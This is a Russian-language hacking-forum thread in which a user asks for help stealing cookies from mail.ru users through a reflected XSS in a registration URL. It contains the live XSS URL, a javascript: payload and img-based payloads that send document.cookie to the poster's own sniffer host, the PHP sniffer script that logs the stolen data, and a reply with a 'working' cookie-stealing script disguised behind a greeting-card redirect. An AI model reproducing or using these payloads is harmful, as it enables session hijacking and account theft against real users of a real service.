Форум АНТИЧАТ - вопрос по css

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)

- - вопрос по css (https://forum.antichat.xyz/showthread.php?t=143133)

вопрос по css

почему работает скрипт:
http://3k.mail.ru/register.php?step=4&nick=wildshaman&cfg=1,2,5,31,5 01,20,9&element=1&code="><script>alert('css')</script>

а этот не работает:
http://3k.mail.ru/register.php?step=4&nick=wildshaman&cfg=1,2,5,31,5 01,20,9&element=1&code="><script>img=new Image();img.src="http://slavaka1.metastock.ru/111.php?"+document.cookie();</script>

P.S. модераторам зачем удаляете мои темы? я жду помощи от людей. :mad:

а с чего он будет работать? и причем тут css?

Цитата:

Сообщение от plas

а с чего он будет работать? и причем тут css?

Сross Site Sсriрting

ндааа. просто все рабочее, я хз в чем дело ? пассивку нашол, снифер работает а передать не хочет

через эту строку могу куки передать:
javascript:var%20s=document.createElement('script' );s.src='http://slavaka1.metastock.ru/111.php?nc='+document.cookie;document.body.appendC hild(s);void(0);

а скриптом не получается.
Помогите люди добрые
или скиньте в личку пассивку рабочую

администрация помогите мне

Цитата:

Сообщение от slavka1

администрация помогите мне

Администрация тебе не чем не обязана!так что не надо тут кричать.ты бы лучше толком пояснил что ты делал и что не получается?ото без 100грам не разобраться :mad:

Здраствуйте уважаемый античат и участники форума.
У меня наболевщая пролемма.
начитавшись всевозможной информации по xss атакам я решил реализовать то что усвоил но пришол в тупик. проблемма наверняка для вас пустяковая, но мне не разобраться одному, поэтому прошу у вас помощи.
По схеме сделал сниффер:

PHP код:


		
			
<?php  $fp=fopen("log.html","a+t");  fputs($fp," Время: ".date("[D d/m/Y H:i]")."<br> IP: ".$_SERVER['REMOTE_ADDR']."<br> Откуда: ".htmlentities($_SERVER['HTTP_REFERER'])."<br> Браузер: ".$_SERVER['HTTP_USER_AGENT']."<br> QUERY_STRING: ".$_SERVER['QUERY_STRING']."<br><br> "); fclose($fp);  ?>

закачал его на хостинг
нашол на форуме в разделе "Пассивные xss на почтовый серверах" нашол эту самую xss:

Код:

http://3k.mai............nt=1&code="><script>alert('xss')</script>

(ссылку даю не полную так как возможно изза этого удаляют мои темы)
этот скрипт работает.
а если вписываешь в него строку со ссылкой инфы на снифер то ноль, вот такой код добавляю:

Код:

<script>img=new Image();img.src="адресс снифера?"+document.cookie();</script>

подскажите в чем проблема тут, фильтрация тегов?
или чтото другое? помогите пожалуста мне больше неккому обратиться.

Цитата:

Сообщение от slavka1

PHP код:


		
			
<?php  $fp=fopen("log.html","a+t");  fputs($fp," Время: ".date("[D d/m/Y H:i]")."<br> IP: ".$_SERVER['REMOTE_ADDR']."<br> Откуда: ".htmlentities($_SERVER['HTTP_REFERER'])."<br> Браузер: ".$_SERVER['HTTP_USER_AGENT']."<br> QUERY_STRING: ".$_SERVER['QUERY_STRING']."<br><br> "); fclose($fp);  ?>

закачал его на хостинг
нашол на форуме в разделе "Пассивные xss на почтовый серверах" нашол эту самую xss:

Код:

http://3k.mai............nt=1&code="><script>alert('xss')</script>

Код:

<script>img=new Image();img.src="адресс снифера?"+document.cookie();</script>

Как я вкурил,ты хочеш получить куки методом отправки открытки img.держи рабочий скрипт

Код:

<script>img = new Image(); img.src = "адрес снифера"+document.cookie; // здесь ваш код для кражи кукис

 // редирект через 3 сек.

    var URL = "http://images.cards.mail.ru/11bolprivet.jpg" // адрес открытки, если хотите, можете изменить на свой =)

    var speed = 3000

    function reload() {

    document.location = URL

    }

    setTimeout("reload()", speed);

</script>

сохраняй скрипт в расширение img и будет тебе счастье.а так по большому щету и твой скрипт должен быть рабочий.и если надо могу дать сылку на онлайн снифер :cool: которым сам пользуюсь :D

о спасибо добрый человек, сейчас буду разбираться. спасибо еще раз